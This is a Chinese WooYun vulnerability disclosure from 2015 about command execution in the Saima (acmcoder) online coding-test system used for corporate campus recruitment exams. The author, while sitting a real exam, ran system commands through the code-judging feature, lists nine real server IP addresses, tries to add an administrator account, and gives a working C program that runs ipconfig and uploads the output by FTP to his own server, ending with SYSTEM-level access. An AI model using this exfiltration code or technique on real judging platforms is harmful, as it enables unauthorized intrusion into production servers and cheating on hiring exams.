当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141839

漏洞标题:看我如何免笔试获取多家大型企业校招面试资格(赛码校招笔试系统命令执行分析)

相关厂商:杭州赛码网络科技有限公司

漏洞作者: Mr .LZH

提交时间:2015-09-18 10:44

修复时间:2015-11-02 10:46

公开时间:2015-11-02 10:46

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

参加百度校招笔试,脑洞大开,挖到命令执行。
另求中大型企业安全岗offer。

详细说明:

多家大型企业使用了赛码进行校招笔试。

QQ截图20150917184521.png


今天参加百度校招笔试http://baidu.acmcoder.com/cand/login

QQ截图20150917185121.png


代码题可以编译执行,猜测没有虚拟机运行,可执行危险代码。
先探测一下是什么系统,由于此处漏洞无法显示执行结果,只有答案是否正确和运行超时,所以想了办法绕过限制。ping 127.0.0.1会导致超时,如果前面的ipconfig执行成功会继续执行第二句,导致超时,判断系统为window。

1.png


2.png


由此证明可以执行系统命令。
接下来获取服务器ip,在我自己的服务器建立FTP,查看日志。

3.png


4.jpg


成功得到IP地址。
猜测有多台主机分布式运行,多次探测,得到9台服务器。(这里使用了linux下的FTP空间)

6.png


ip列表:
123.56.166.179
101.200.75.176
123.57.58.252
123.56.228.6
182.92.80.211
182.92.73.249
123.57.164.234
123.56.226.157
123.57.164.154


强势添加用户名。并利用后面的ftp命令来确定当前添加账号的服务器ip是哪个。

5.png


但是最终没办法登陆,服务器限制了用户组远程连接服务器。
直接拿取服务器权限的想法放弃,当然如果手头上有远控,直接上没问题,可惜我没有。。。。
于是想办法回显命令。
刚开始使用system("ipconfig >result.txt && echo ftp>ftp.txt && echo xxxxxxxx>>ftp.txt && echo cd pub>>ftp.txt &&echo put result.txt>>ftp.txt && echo bye>>ftp.txt && ftp -s:ftp.txt 119.81.xxx.xxx &&del ftp.txt && del result.txt");
执行命令后内容写入result.txt,再把FTP命令写入ftp.txt,执行ftp -s:ftp.txt 119.81.xxx.xxx连接FTP并把结果上传到空间,最后删除两个txt文件。
但是执行失败,最终找到原因,这里特地指出,避免大家也跳坑。echo ftp>ftp.txt执行后添加一行内容,这一行内容为 ftp空格 ,就是这一个空格导致无法成功登陆FTP服务器。
最后直接使用c语言中写入FTP配置。

#include <stdio.h>  
#include <stdlib.h>
int main() {
FILE *fp;
fp=fopen("ftp.txt", "w+"); /*建立一个文字文件只写*/
fputs("ftp\nxxxxxx\ncd pub\nput result.txt\nbye",fp); /*向所建文件写入一串字符*/
fclose(fp);
system("ipconfig >result.txt && ftp -s:ftp.txt 119.81.xxx.xxx &&del ftp.txt && del result.txt");
}


7.png


上面的指令执行了相同内容。
FTP得到结果:

8.png


最后我执行了一次whoami命令,惊呆的发现是nt authority\system权限,醉了。。。
接下来也用不着演示了

漏洞证明:

修复方案:

版权声明:转载请注明来源 Mr .LZH@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)